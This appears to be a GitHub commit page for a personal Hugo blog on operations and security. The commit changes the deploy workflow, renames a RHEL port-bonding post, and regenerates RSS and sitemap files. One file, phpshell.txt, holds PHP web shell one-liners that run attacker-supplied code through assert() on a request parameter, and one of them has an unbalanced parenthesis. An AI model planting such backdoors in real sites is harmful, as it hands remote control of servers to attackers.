Skip to content

Commit 738dffa

Browse files
author
runshell
committed
modified: .github/workflows/deploy.yml
renamed: "content/post/\345\237\272\347\241\200\350\277\220\347\273\264/RHEL810\347\253\257\345\217\243\350\201\232\345\220\210.md" -> "content/post/\345\237\272\347\241\200\350\277\220\347\273\264/RHEL 810\347\253\257\345\217\243\350\201\232\345\220\210.md" modified: public/categories/index.xml modified: "public/categories/\345\237\272\347\241\200\350\277\220\347\273\264/index.xml" modified: "public/categories/\347\275\221\347\273\234\345\256\211\345\205\250/index.xml" modified: public/phpshell.txt modified: public/post/index.xml modified: public/sitemap.xml modified: public/tags/burpsuite/index.xml modified: public/tags/curl/index.xml modified: public/tags/dnslog/index.xml modified: public/tags/index.xml modified: public/tags/loadrunner12/index.xml modified: public/tags/office/index.xml modified: public/tags/powersploit/index.xml new file: public/tags/rhel/index.xml modified: "public/tags/ssh\351\232\247\351\201\223/index.xml" modified: public/tags/touch/index.xml modified: "public/tags/\345\206\205\347\275\221\347\251\277\351\200\217/index.xml" modified: "public/tags/\346\200\247\350\203\275\346\265\213\350\257\225/index.xml" modified: "public/tags/\346\226\207\344\273\266\346\227\266\351\227\264\346\210\263/index.xml" modified: "public/tags/\347\253\257\345\217\243\350\275\254\345\217\221/index.xml" modified: "public/tags/\347\275\221\347\273\234\345\256\211\345\205\250/index.xml"
1 parent 288bb9e commit 738dffa

File tree

23 files changed

+565
-5518
lines changed

23 files changed

+565
-5518
lines changed

.github/workflows/deploy.yml

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,9 @@ jobs:
1111
steps:
1212
- name: Checkout code
1313
uses: actions/checkout@v2
14+
with:
15+
submodules: recursive # 确保主题子模块也被检出
16+
fetch-depth: 0 # 获取所有历史记录
1417

1518
- name: Setup Hugo
1619
uses: peaceiris/actions-hugo@v2
@@ -19,12 +22,11 @@ jobs:
1922
extended: true
2023

2124
- name: Build
22-
run: hugo
25+
run: hugo --minify # 添加minify优化输出
2326

2427
- name: Deploy
2528
uses: peaceiris/actions-gh-pages@v3
2629
with:
2730
github_token: ${{ secrets.GITHUB_TOKEN }}
28-
2931
publish_dir: ./public
3032
publish_branch: gh-page

content/post/基础运维/RHEL810端口聚合.md renamed to content/post/基础运维/RHEL 810端口聚合.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
---
2-
title: "RHEL810端口聚合" # 文章标题
2+
title: "RHEL 810端口聚合" # 文章标题
33
date: 2025-05-06T10:58:00+08:00 # 文章创建日期
44
draft: false # 是否为草稿,true 表示草稿,不会在网站上显示
55
author: "runshell" # 文章作者

public/categories/index.xml

Lines changed: 23 additions & 24 deletions
Original file line numberDiff line numberDiff line change
@@ -1,27 +1,26 @@
11
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
22
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
3-
<channel>
4-
<title>Categories on runshell</title>
5-
<link>http://localhost:1313/categories/</link>
6-
<description>Recent content in Categories on runshell</description>
7-
<generator>Hugo -- gohugo.io</generator>
8-
<language>zh-CN</language>
9-
<lastBuildDate>Mon, 05 May 2025 14:30:00 +0800</lastBuildDate><atom:link href="http://localhost:1313/categories/index.xml" rel="self" type="application/rss+xml" /><item>
10-
<title>基础运维</title>
11-
<link>http://localhost:1313/categories/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</link>
12-
<pubDate>Mon, 05 May 2025 14:30:00 +0800</pubDate>
13-
14-
<guid>http://localhost:1313/categories/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</guid>
15-
<description></description>
16-
</item>
17-
<item>
18-
<title>网络安全</title>
19-
<link>http://localhost:1313/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/</link>
20-
<pubDate>Sun, 15 Jul 2018 14:30:00 +0800</pubDate>
21-
22-
<guid>http://localhost:1313/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/</guid>
23-
<description></description>
24-
</item>
25-
26-
</channel>
3+
<channel>
4+
<title>Categories on runshell</title>
5+
<link>http://localhost:1313/categories/</link>
6+
<description>Recent content in Categories on runshell</description>
7+
<generator>Hugo</generator>
8+
<language>zh-CN</language>
9+
<lastBuildDate>Tue, 06 May 2025 10:58:00 +0800</lastBuildDate>
10+
<atom:link href="http://localhost:1313/categories/index.xml" rel="self" type="application/rss+xml" />
11+
<item>
12+
<title>基础运维</title>
13+
<link>http://localhost:1313/categories/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</link>
14+
<pubDate>Tue, 06 May 2025 10:58:00 +0800</pubDate>
15+
<guid>http://localhost:1313/categories/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</guid>
16+
<description></description>
17+
</item>
18+
<item>
19+
<title>网络安全</title>
20+
<link>http://localhost:1313/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/</link>
21+
<pubDate>Sun, 15 Jul 2018 14:30:00 +0800</pubDate>
22+
<guid>http://localhost:1313/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/</guid>
23+
<description></description>
24+
</item>
25+
</channel>
2726
</rss>

public/categories/基础运维/index.xml

Lines changed: 37 additions & 505 deletions
Large diffs are not rendered by default.

public/categories/网络安全/index.xml

Lines changed: 44 additions & 720 deletions
Large diffs are not rendered by default.

public/phpshell.txt

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
1-
1+
//php5
22
<?php
33
$a='assert';
44
[""=>$a($_REQUEST['a'])];
55
?>
6-
6+
//php7
77
<?php
88
'assert'($_REQUEST['a']));
99
?>

public/post/index.xml

Lines changed: 72 additions & 1217 deletions
Large diffs are not rendered by default.

public/sitemap.xml

Lines changed: 13 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -3,27 +3,30 @@
33
xmlns:xhtml="http://www.w3.org/1999/xhtml">
44
<url>
55
<loc>http://localhost:1313/</loc>
6-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
6+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
77
</url><url>
88
<loc>http://localhost:1313/categories/</loc>
9-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
9+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
1010
</url><url>
11-
<loc>http://localhost:1313/tags/office/</loc>
12-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
11+
<loc>http://localhost:1313/post/</loc>
12+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
1313
</url><url>
14-
<loc>http://localhost:1313/post/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/office-%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85%E6%BF%80%E6%B4%BB/</loc>
15-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
14+
<loc>http://localhost:1313/tags/rhel/</loc>
15+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
1616
</url><url>
17-
<loc>http://localhost:1313/post/</loc>
18-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
17+
<loc>http://localhost:1313/post/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/rhel-8.10%E7%AB%AF%E5%8F%A3%E8%81%9A%E5%90%88/</loc>
18+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
1919
</url><url>
2020
<loc>http://localhost:1313/tags/</loc>
21-
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
21+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
2222
</url><url>
2323
<loc>http://localhost:1313/categories/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</loc>
24+
<lastmod>2025-05-06T10:58:00+08:00</lastmod>
25+
</url><url>
26+
<loc>http://localhost:1313/tags/office/</loc>
2427
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
2528
</url><url>
26-
<loc>http://localhost:1313/tags/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/</loc>
29+
<loc>http://localhost:1313/post/%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4/office-%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85%E6%BF%80%E6%B4%BB/</loc>
2730
<lastmod>2025-05-05T14:30:00+08:00</lastmod>
2831
</url><url>
2932
<loc>http://localhost:1313/about/</loc>

0 commit comments

Comments
 (0)